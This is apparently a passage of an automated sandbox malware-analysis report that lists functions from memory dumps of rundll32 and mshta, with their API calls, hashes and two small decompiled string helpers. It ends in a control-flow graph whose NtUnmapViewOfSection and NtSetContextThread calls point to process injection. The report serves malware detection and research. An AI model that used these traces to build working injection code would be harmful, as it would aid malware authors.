                                                          • Instruction Fuzzy Hash: 08F0D4747503059FEB498B25F95EF6937B6AFC8309B14401CEA07DB251D734A840CE39
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06280901 Relevance: 5.2, APIs: 4, Instructions: 171memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memset.NTDLL ref: 0628095D
                                                          • CloseHandle.KERNEL32(?,?,00000100,?,00000000,?,0627C1F8,00000000), ref: 062809AB
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000094,00000000,06291616,00000000,0627C1F8,0628E6A0,00000000,0627C1F8,062800C3,00000000,0627C1F8,0627306D,00000000), ref: 06280CB6
                                                          • GetLastError.KERNEL32(?,00000000,?), ref: 06280FB8
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseErrorFreeHandleHeapLastmemset
                                                          • String ID:
                                                          • API String ID: 2333114656-0
                                                          • Opcode ID: 0d1d97448cd183993e3c2a46ec96d41e25f50b416c52ea0675af0e04bf483ef7
                                                          • Instruction ID: 7d8dc01359f20621b21d2a8b7cc6254a0fc3e36f8c88ba4bcf9675576b0d7abd
                                                          • Opcode Fuzzy Hash: 0d1d97448cd183993e3c2a46ec96d41e25f50b416c52ea0675af0e04bf483ef7
                                                          • Instruction Fuzzy Hash: E551FB3263631AFEFBD17E60DC41F6B7659AFB5610F108011FD15A60C0DEB08959CBAA
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0627174F Relevance: 5.1, APIs: 4, Instructions: 83memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0628D698: lstrlen.KERNEL32(00000000,?,?,00000000,?,?,00000001,00000001,?,06271785,?,?,?,?,?), ref: 0628D6F2
                                                            • Part of subcall function 0628D698: lstrlen.KERNEL32(?,?,?,00000000,?,?,00000001,00000001,?,06271785,?,?,?,?,?), ref: 0628D710
                                                            • Part of subcall function 0628D698: RtlAllocateHeap.NTDLL(00000000,76C86985,?), ref: 0628D73C
                                                            • Part of subcall function 0628D698: memcpy.NTDLL(00000000,00000000,00000000,?,?,00000001,00000001,?,06271785,?,?,?,?,?), ref: 0628D753
                                                            • Part of subcall function 0628D698: HeapFree.KERNEL32(00000000,00000000), ref: 0628D766
                                                            • Part of subcall function 0628D698: memcpy.NTDLL(00000000,?,?,?,?,00000001,00000001,?,06271785,?,?,?,?,?), ref: 0628D775
                                                          • GetLastError.KERNEL32 ref: 062717EE
                                                            • Part of subcall function 06283BAA: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 06283C58
                                                            • Part of subcall function 06283BAA: HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 06283C7C
                                                            • Part of subcall function 06283BAA: HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,062717D6,?,?,?,?,?,?,?), ref: 06283C8A
                                                          • HeapFree.KERNEL32(00000000,?), ref: 0627180A
                                                          • HeapFree.KERNEL32(00000000,?), ref: 0627181B
                                                          • SetLastError.KERNEL32(00000000), ref: 0627181E
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$Free$ErrorLastlstrlenmemcpy$Allocate
                                                          • String ID:
                                                          • API String ID: 2451549186-0
                                                          • Opcode ID: 0761adf020b83e8f9020db0a87f909ff9764dbbd0af5e4f8cfa4d3fd06eda539
                                                          • Instruction ID: dec014aefd943a784f0db2e8c20a4310020470573aca68bbaa5319e368ef0ad9
                                                          • Opcode Fuzzy Hash: 0761adf020b83e8f9020db0a87f909ff9764dbbd0af5e4f8cfa4d3fd06eda539
                                                          • Instruction Fuzzy Hash: 29311832910209BFCF529F99DC48C9EBFB6FF89360B144156FD16A6160D7318A61DFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0627A78E Relevance: 5.1, APIs: 4, Instructions: 83memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 062863D1: lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,0627A7C4,?,?,?,?), ref: 062863F5
                                                            • Part of subcall function 062863D1: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 06286407
                                                            • Part of subcall function 062863D1: wcstombs.NTDLL ref: 06286415
                                                            • Part of subcall function 062863D1: lstrlen.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,00000001,00000001,?,0627A7C4,?,?,?), ref: 06286439
                                                            • Part of subcall function 062863D1: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 0628644E
                                                            • Part of subcall function 062863D1: mbstowcs.NTDLL ref: 0628645B
                                                            • Part of subcall function 062863D1: HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,0627A7C4,?,?,?,?,?), ref: 0628646D
                                                            • Part of subcall function 062863D1: HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,0627A7C4,?,?,?,?,?), ref: 06286487
                                                          • GetLastError.KERNEL32 ref: 0627A82D
                                                            • Part of subcall function 06283BAA: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 06283C58
                                                            • Part of subcall function 06283BAA: HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 06283C7C
                                                            • Part of subcall function 06283BAA: HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,062717D6,?,?,?,?,?,?,?), ref: 06283C8A
                                                          • HeapFree.KERNEL32(00000000,?), ref: 0627A849
                                                          • HeapFree.KERNEL32(00000000,?), ref: 0627A85A
                                                          • SetLastError.KERNEL32(00000000), ref: 0627A85D
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$Free$AllocateErrorLastlstrlen$mbstowcswcstombs
                                                          • String ID:
                                                          • API String ID: 3867366388-0
                                                          • Opcode ID: 7f146c4bfdef0af51011e33799ca73c9bca2a935fd30b17850e5996018e245db
                                                          • Instruction ID: 63679b40616192f4e46445be7b6f9712fa045207f8b2b6d0dd57528dac6a2a13
                                                          • Opcode Fuzzy Hash: 7f146c4bfdef0af51011e33799ca73c9bca2a935fd30b17850e5996018e245db
                                                          • Instruction Fuzzy Hash: B1311831910209EFCF429FA9DC44C9EBFB6FF89760B10415AFA25A6160D7718A61DFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06276FC7 Relevance: 5.1, APIs: 4, Instructions: 76COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: memset
                                                          • String ID:
                                                          • API String ID: 2221118986-0
                                                          • Opcode ID: c315edd6ff2106f6e47bc1e55d3121a2bf8e198cf96ec4c77e539c564c770674
                                                          • Instruction ID: 2ed6f4a705c915c033b3038a261c80e7c11fee1ca282c1cf9df6fa83d889b86d
                                                          • Opcode Fuzzy Hash: c315edd6ff2106f6e47bc1e55d3121a2bf8e198cf96ec4c77e539c564c770674
                                                          • Instruction Fuzzy Hash: E6216DB292191BBFCBA1AF61DC85D66BB69FF09300B140119ED4686C50D733E8B1CBD1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D45C4 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 58%
                                                          			E036D45C4(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E036D6D63(_t2);
				if(_t34 != 0) {
					_t30 = E036D6D63(_t28);
					if(_t30 == 0) {
						E036D6C2C(_t34);
					} else {
						_t39 = _a4;
						_t22 = E036D7A57(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E036D7A57(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                                                          0x036d45c4
                                                          0x036d45ce
                                                          0x036d45d0
                                                          0x036d45d6
                                                          0x036d45d6
                                                          0x036d45df
                                                          0x036d45e3
                                                          0x036d45ef
                                                          0x036d45f3
                                                          0x036d4667
                                                          0x036d45f5
                                                          0x036d45f5
                                                          0x036d45f9
                                                          0x036d45fe
                                                          0x036d4603
                                                          0x036d461d
                                                          0x036d460c
                                                          0x036d460c
                                                          0x036d4610
                                                          0x036d4613
                                                          0x036d4618
                                                          0x036d4618
                                                          0x036d4622
                                                          0x036d464a
                                                          0x036d4650
                                                          0x036d4653
                                                          0x036d4624
                                                          0x036d4626
                                                          0x036d462e
                                                          0x036d4639
                                                          0x036d463e
                                                          0x036d463e
                                                          0x036d465a
                                                          0x036d4661
                                                          0x036d4662
                                                          0x036d4662
                                                          0x036d45f3
                                                          0x036d4672

                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,00000008,?,76C84D40,?,?,036D6973,?,?,?,?,00000102,036D37A0,?,?,76CC81D0), ref: 036D45D0
                                                            • Part of subcall function 036D6D63: RtlAllocateHeap.NTDLL(00000000,00000000,036D5D7B), ref: 036D6D6F
                                                            • Part of subcall function 036D7A57: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,036D45FE,00000000,00000001,00000001,?,?,036D6973,?,?,?,?,00000102), ref: 036D7A65
                                                            • Part of subcall function 036D7A57: StrChrA.SHLWAPI(?,0000003F,?,?,036D6973,?,?,?,?,00000102,036D37A0,?,?,76CC81D0,00000000), ref: 036D7A6F
                                                          • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,036D6973,?,?,?,?,00000102,036D37A0,?), ref: 036D462E
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 036D463E
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 036D464A
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 3767559652-0
                                                          • Opcode ID: 7ce6c93d68d19f528a038a51f24f25ded80f2a3d3b14181917dee6050b777135
                                                          • Instruction ID: 92269eb1997e8ecba37389f30cc84c3b37d985bba72e07d26cc267c630c7740f
                                                          • Opcode Fuzzy Hash: 7ce6c93d68d19f528a038a51f24f25ded80f2a3d3b14181917dee6050b777135
                                                          • Instruction Fuzzy Hash: E821C076D04295ABCB12EF75E884EAABFA8AF05280F095058F9069F201DF35D911CBE0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0627D429 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,0628DD0F,00000000,00000000,00000004,00000000,?,0627DBAC,?,?,00000000), ref: 0627D435
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                            • Part of subcall function 06292DE3: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,0627D463,00000000,00000001,00000001,?,?,0628DD0F,00000000,00000000,00000004,00000000), ref: 06292DF1
                                                            • Part of subcall function 06292DE3: StrChrA.SHLWAPI(?,0000003F,?,?,0628DD0F,00000000,00000000,00000004,00000000,?,0627DBAC,?,?,00000000,06273EC6,?), ref: 06292DFB
                                                          • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,0628DD0F,00000000,00000000,00000004,00000000,?,0627DBAC,?), ref: 0627D493
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0627D4A3
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0627D4AF
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 3767559652-0
                                                          • Opcode ID: 33d0ccf869807608567956bc4b747df68cb9b3fcd09fdca9229121a6c38e8076
                                                          • Instruction ID: 5c90ebfa4e95e607a9f1595756ca9d198ad3896c5c7392caf4707ed6b67472ae
                                                          • Opcode Fuzzy Hash: 33d0ccf869807608567956bc4b747df68cb9b3fcd09fdca9229121a6c38e8076
                                                          • Instruction Fuzzy Hash: 3121C032920256AFCB82AF64CC98EAE7FA99F46294B048454ED089B201D675DA00D7F0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06285189 Relevance: 5.1, APIs: 4, Instructions: 64COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: memset
                                                          • String ID:
                                                          • API String ID: 2221118986-0
                                                          • Opcode ID: 675587d73748d83cb1657c9497af44e6ba026aede7eedd5967ca4f42d02b1d89
                                                          • Instruction ID: 0a6a20c0698abe8b671f2d01bbd9a60a1c385b18e130b8bc6c3e40c8ad5acea8
                                                          • Opcode Fuzzy Hash: 675587d73748d83cb1657c9497af44e6ba026aede7eedd5967ca4f42d02b1d89
                                                          • Instruction Fuzzy Hash: 6711917296291ABFC790BFA0DC84A567778FF09300B050118ED45A2C90DB76F5B1DBE1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D28C4 Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E036D28C4(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E036D6D63(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                                                          0x036d28d9
                                                          0x036d28dd
                                                          0x036d28e7
                                                          0x036d28ec
                                                          0x036d28f1
                                                          0x036d28f3
                                                          0x036d28fb
                                                          0x036d2900
                                                          0x036d290e
                                                          0x036d2913
                                                          0x036d291d

                                                          APIs
                                                          • lstrlenW.KERNEL32(004F0053,?,76C85520,00000008,059693F4,?,036D21EB,004F0053,059693F4,?,?,?,?,?,?,036D66BE), ref: 036D28D4
                                                          • lstrlenW.KERNEL32(036D21EB,?,036D21EB,004F0053,059693F4,?,?,?,?,?,?,036D66BE), ref: 036D28DB
                                                            • Part of subcall function 036D6D63: RtlAllocateHeap.NTDLL(00000000,00000000,036D5D7B), ref: 036D6D6F
                                                          • memcpy.NTDLL(00000000,004F0053,76C869A0,?,?,036D21EB,004F0053,059693F4,?,?,?,?,?,?,036D66BE), ref: 036D28FB
                                                          • memcpy.NTDLL(76C869A0,036D21EB,00000002,00000000,004F0053,76C869A0,?,?,036D21EB,004F0053,059693F4), ref: 036D290E
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: lstrlenmemcpy$AllocateHeap
                                                          • String ID:
                                                          • API String ID: 2411391700-0
                                                          • Opcode ID: eb1af2adb76017e40f73d4395a6c4a2806d0f2fb4ce99aac57c9927c0e840cbd
                                                          • Instruction ID: be9c6001698bdc38f3d81c1a9da7721cb7d6637eda4a81051362f25e04a49e40
                                                          • Opcode Fuzzy Hash: eb1af2adb76017e40f73d4395a6c4a2806d0f2fb4ce99aac57c9927c0e840cbd
                                                          • Instruction Fuzzy Hash: 2EF0497AD00119BB8F11EFA9DC84CCE7BACEF082547154066E904DB205E731EA148BE0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06288193 Relevance: 5.0, APIs: 4, Instructions: 38stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(69B25F44,?,?,00000000,06285F22,00000000,00000000,?,00000000,69B25F44,?,?,?,?,?,69B25F44), ref: 062881A4
                                                          • lstrlen.KERNEL32(?,?,?,?), ref: 062881A9
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • memcpy.NTDLL(00000000,?,00000000,?,?,?,?), ref: 062881C5
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 062881E3
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrlen$AllocateHeaplstrcpymemcpy
                                                          • String ID:
                                                          • API String ID: 1697500751-0
                                                          • Opcode ID: 3fda720ea70a07f55cc77b11d4265c4cf5d92ece5e64ef9b294d74746103d103
                                                          • Instruction ID: a6013257a57a4ada7ddc2c81d991233ce1d3b07bd63d8a25c1154e34ea4e6218
                                                          • Opcode Fuzzy Hash: 3fda720ea70a07f55cc77b11d4265c4cf5d92ece5e64ef9b294d74746103d103
                                                          • Instruction Fuzzy Hash: 6FF04677801752AFD762A6699C4CF1B7B9CBFC8211B480411ED1883100EB35D404CBB1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D393C Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(05969B68,00000000,00000000,00000000,036D5902,00000000), ref: 036D394C
                                                          • lstrlen.KERNEL32(?), ref: 036D3954
                                                            • Part of subcall function 036D6D63: RtlAllocateHeap.NTDLL(00000000,00000000,036D5D7B), ref: 036D6D6F
                                                          • lstrcpy.KERNEL32(00000000,05969B68), ref: 036D3968
                                                          • lstrcat.KERNEL32(00000000,?), ref: 036D3973
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                          • String ID:
                                                          • API String ID: 74227042-0
                                                          • Opcode ID: e8d3f5087627997518507c251d007682c8d319c772c70274b596de497a758ebf
                                                          • Instruction ID: 1a7131626bba269e91d6a9e06c1969fc5d61128dcf9fe620aaca652ed0e1d85f
                                                          • Opcode Fuzzy Hash: e8d3f5087627997518507c251d007682c8d319c772c70274b596de497a758ebf
                                                          • Instruction Fuzzy Hash: B2E09273D02620A78711ABF4BC48C9BBBBDEF89761705041AFA00D7208C72598118BE1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06278DC7 Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(06898560,76C85520,76CC81D0,773BEEF0,0627E873,?), ref: 06278DD7
                                                          • lstrlen.KERNEL32(?), ref: 06278DDF
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • lstrcpy.KERNEL32(00000000,06898560), ref: 06278DF3
                                                          • lstrcat.KERNEL32(00000000,?), ref: 06278DFE
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                          • String ID:
                                                          • API String ID: 74227042-0
                                                          • Opcode ID: 6c0679c9ed42fb3c7ddd9fbb1d6f5d97451307c28520797014cca533c5a8766a
                                                          • Instruction ID: eef3b5f5dff5aed3d8175d1d2993de3681ad9144179194f7b42de8d4121e3fba
                                                          • Opcode Fuzzy Hash: 6c0679c9ed42fb3c7ddd9fbb1d6f5d97451307c28520797014cca533c5a8766a
                                                          • Instruction Fuzzy Hash: 07E0ED73A01725AB87529AA4AC4CC9FBBADEFC96693040916FB04E3100C72599058BF1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Executed Functions

                                                          Function 0000016AD2E50FB2 Relevance: .0, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000003.338289640.0000016AD2E50000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000016AD2E50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_3_16ad2e50000_mshta.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 31d9662255b7f249616ceadde9cc10f7be338c06862ab3e0198782b9ef533960
                                                          • Instruction ID: 3d0b36a34807be66aec4066947b7ab3a62546e34c8849a56c77563e3ea26bc46
                                                          • Opcode Fuzzy Hash: 31d9662255b7f249616ceadde9cc10f7be338c06862ab3e0198782b9ef533960
                                                          • Instruction Fuzzy Hash: 7AB0120447FBC24ED70313B30C6529D2F60AE4B224FC959C79045D5097E40D058D9333
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0000016AD2E50FC1 Relevance: .0, Instructions: 5COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000003.338289640.0000016AD2E50000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000016AD2E50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_3_16ad2e50000_mshta.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                          • Instruction ID: b536561196103fe8a7c4cd41dfc3e93c69bcdbe6822835afccc1767bb959815d
                                                          • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                          • Instruction Fuzzy Hash: F69002154A540655D41411E24C4529C5441678D260FD484805516A0548D84E02965563
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Executed Functions

                                                          Function 00529660 Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 648COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 529660-5296bc 1 5296d3-5296db 0->1 2 5296be-5296d1 0->2 3 5296e0-5296e8 1->3 2->3 4 5296f2-5296fa 3->4 5 5296ea-5296ed 3->5 7 52973f-529749 4->7 8 5296fc-529719 4->8 6 529cfe-529d1a 5->6 9 529c7e 7->9 10 52974f-52975f 7->10 16 529723-52973d call 5460dc 8->16 17 52971b-52971e 8->17 13 529c83-529c86 9->13 10->9 11 529765-529771 10->11 14 529777-52977f 11->14 15 5299a4-5299a8 11->15 18 529c97-529c9a 13->18 19 529c88-529c92 NtUnmapViewOfSection 13->19 22 529785-5297c0 call 53583c 14->22 23 5299ae-5299b3 14->23 15->22 15->23 16->7 24 529cd5-529cdd 17->24 20 529cd0-529cd1 18->20 21 529c9c-529ca7 18->21 19->18 20->24 26 529cb2-529cb9 NtClose 21->26 27 529ca9-529cab 21->27 35 5297c6-5297fc call 5341d8 22->35 36 529c77-529c7c 22->36 23->24 24->6 29 529cdf-529cf6 call 52e53c 24->29 34 529cbe-529cc8 26->34 27->26 31 529cad-529cb0 27->31 29->6 31->20 34->20 35->13 40 529802-529816 call 546c4c 35->40 36->13 40->13 43 52981c-52981f 40->43 44 529830-529835 43->44 45 529821-52982b call 52b7b8 43->45 46 529862-529888 call 52b7b8 44->46 47 529837-52983f 44->47 45->44 53 52988a-529898 46->53 54 52989b-52989f 46->54 47->46 49 529841-529842 47->49 51 529845-529860 49->51 51->46 51->51 53->54 55 5298a1-5298b5 54->55 56 5298b8-5298c5 54->56 55->56 57 5298cb-5298f5 56->57 58 5299b8-5299bf 56->58 59 5298f7-5298fe 57->59 60 52990d-529930 call 545684 57->60 61 5299c1-5299c8 58->61 62 5299d7-5299fc 58->62 59->60 63 529900-529907 59->63 70 529936-52995d call 545684 60->70 71 529a88-529a8a 60->71 61->62 64 5299ca-5299d1 61->64 62->71 72 529a02-529a26 call 5225c0 62->72 63->60 66 529992-52999f 63->66 64->62 67 529a76-529a7a 64->67 73 529a80-529a83 call 52b7b8 66->73 67->73 70->71 82 529963-52998a call 545684 70->82 71->13 77 529a90-529ad4 call 52b7b8 71->77 72->71 83 529a28-529a4c call 5225c0 72->83 73->71 89 529ada-529b1f call 52e53c * 2 77->89 90 529c5c-529c5e 77->90 82->71 91 529990 82->91 83->71 92 529a4e-529a72 call 5225c0 83->92 102 529b25-529b52 call 5404cc 89->102 103 529c2b-529c32 89->103 90->13 95 529c60-529c6b 90->95 91->66 92->71 100 529a74 92->100 95->13 98 529c6d-529c75 95->98 98->13 100->67 109 529c42-529c48 102->109 110 529b58-529b65 102->110 107 529c34-529c39 103->107 108 529c3b 103->108 111 529c4a-529c54 107->111 112 529c3d-529c40 108->112 109->111 113 529b67-529b7b 110->113 114 529b7d-529b7f 110->114 111->90 112->109 112->111 113->114 114->112 115 529b85-529bda call 52b7b8 114->115 121 529be4-529c02 call 526d24 115->121 122 529bdc-529be1 115->122 121->111 125 529c04-529c11 121->125 122->121 125->112 126 529c13-529c1f NtSetContextThread 125->126 127 529c27-529c29 126->127 127->112
                                                          Strings
                                                          Memory Dump Source
